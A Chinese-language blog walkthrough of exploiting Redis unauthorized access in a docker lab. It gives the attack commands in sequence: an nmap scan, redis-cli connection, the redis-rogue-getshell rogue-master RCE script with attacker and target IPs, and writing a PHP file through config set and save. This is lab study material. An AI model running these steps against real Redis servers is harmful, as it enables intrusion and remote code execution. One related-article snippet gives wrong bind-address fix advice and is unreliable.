Redis未授权访问漏洞

最新推荐文章于 2024-02-26 19:40:54 发布
最新推荐文章于 2024-02-26 19:40:54 发布
阅读量1k 收藏 2
点赞数
文章标签: php 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Snowflake1997/article/details/123283579
版权

靶场环境:redis:4.0.14

docker搭建靶场环境

docker-compose up -d

docker-compose ps

未授权访问远程连接

攻击机安装redis,依次执行以下命令

wget http://download.redis.io/releases/redis-2.8.12.tar.gz

tar -xzf redis-2.8.12.tar.gz

cd redis-2.8.12

make

cd src

./redis-cli -h

nmap扫描靶机

nmap -sV --open -p- 192.168.238.156

发现63791118022端口开启

用攻击机redis连接目标机redis

cd redis-2.8.12/src/

./redis-cli -h 192.168.238.156

使用现有exp实现远程代码执行

克隆exp项目文档

git clone https://github.com/vulhub/redis-rogue-getshell.git

进入该目录下

cd redis-rogue-getshell/RedisModulesSDK/exp

在当前目录下生成一个exp.so文件

make

回到redis-rogue-getshell目录下,利用EXP

./redis-master.py -r 192.168.111.137 -p 6379 -L 192.168.111.139 -P 1111 -f RedisModulesSDK/exp/exp.so -c "id"  //第一个ip是靶机,第二个ip是攻击机

写入webshell

指定工作目录

设置数据库文件名

config set dbfilename tyc.php

追加写入tyc.php文件内容

set trojan "<?php phpinfo();?>"

保存

save   

 将vulhub.zip压缩包复制到靶机中

解压vulhub.zip文件

unzip vulhub.zip

进去对应目录启动容器

安装apache与php

sudo apt install php libapache2-mod-php

冰 雪
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CentOS7中安装Redis4.0.14
我的博客
05-01 3093
前言 工欲善其事必先利其器,操作 Linux 服务器得有一个用着舒服的客户端,这里推荐使用MobaXterm MobaXterm 下载地址:https://mobaxterm.mobatek.net/download.html Redis 下载地址:https://redis.io/download 传输 1. 打开下载好的MobaXterm,使用 SSH 连接方式 ...
授权访问
最新发布
A526847的博客
04-29 1062
授权访问是系统对用户限制不全,或者无限制,可以让任意用户或者限制访问用户,访问到需要权限认证的地址。授权访问通常是会泄露用户信息,系统信息。某些服务和系统中,授权访问还可以执行系统命令,操作系统文件,导致系统的整体安全遭到破坏。就好比:经过主人家授权偷偷进去这种方式就叫做授权。当系统能正确实施访问控制策略,或者用户能够以某种方式绕过这些策略时,就可能发生授权访问。上的,且默认是没有密码的,如果运维没有在上线服务的时候限制访问端口与配置密码则会使我们从外网直接连接。具体表现在Redis绑定在。
redis漏洞复现】Redis getshell的几种方式
一剑开天门!的博客
03-01 1万+
Redis getshell的几种方式
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3284
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 2112
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis-4.0.14.tar.gz
05-12
redis-4.0.14.tar.gz
redis.rar两种Redis-x64-3.2.100.zip及redis-4.0.14.tar.gz
07-23
在官网下载的,直接解压就好。包里有两个:Redis-x64-3.2.100.zip及redis-4.0.14.tar.gz,选自己需要的。
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1429
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
Redis 4.x5.x 授权访问漏洞Redis基于主从复制的RCE)
黑白的博客
12-06 1837
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
授权访问漏洞总结
LuckySec
03-24 4712
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
漏洞复现】---- Redis 4.x/5.x 授权访问漏洞
qq_43168364的博客
12-24 1236
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库Redis提供了多种语言的API。Redis默认使用6379端口 Redis授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis授权访问在4.x/5.0.5以前
redis授权访问漏洞修复方案
热门推荐
午夜安全
01-16 1万+
1.redis授权访问漏洞 通过redis授权访问漏洞,会造成敏感信息泄露,甚至被利用直接控制服务器,其危害不言而喻。但是在实际工作中,发现一些开发人员和运维人员并不知道如何妥善配置。因此有了本文,对redis的配置,建议就是2条,一个就是改强密码,一个就是改端口。 2.redis改密码和端口 给redis设置密码,密码应该由字母、数字、特殊符号组成。像123456,qwer1234这种弱口令肯定不合适,而Q1w@e3r4这种也不合适,因为它太随机、用的人太多,一般密码字典都会收录。所以密码的设置
Redis 授权访问渗透之旅
weixin_45971758的博客
06-29 399
redis 的靶机的漏洞复现的前提条件:redis都是使用root用户进行运行,否则很多保存文件的操作无法实现,也就无法实现webshell 上传,修改ssh公钥,修改计划任务。所以web站点凡是使用redis中间件,都要进行基线检查加固,防止黑客利用授权访问漏洞提权,造成主机失陷。
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值